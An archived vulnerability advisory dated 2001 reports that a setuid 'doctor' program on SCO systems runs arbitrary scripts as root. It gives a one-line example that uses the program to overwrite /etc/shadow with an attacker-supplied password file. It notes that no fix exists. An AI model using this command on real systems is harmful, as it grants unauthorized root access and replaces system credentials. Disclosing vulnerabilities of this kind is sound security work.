TUCoPS :: SCO :: sco4953.htm

doctor suid script vulnerability
24th Dec 2001 [SBWID-4953]
COMMAND

	doctor suid script vulnerability

SYSTEMS AFFECTED

	doctor v . ??

PROBLEM

	Kitwor [http://www.promocja.kki.pl/wirus] posted to securitybugware :
	

	You can execute any command with root priv:
	

	Example: $ echo  \"cat  my_shadow_file  >  /etc/shadow\"  >  ./script  $
	doctor -s ./script

SOLUTION

	Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH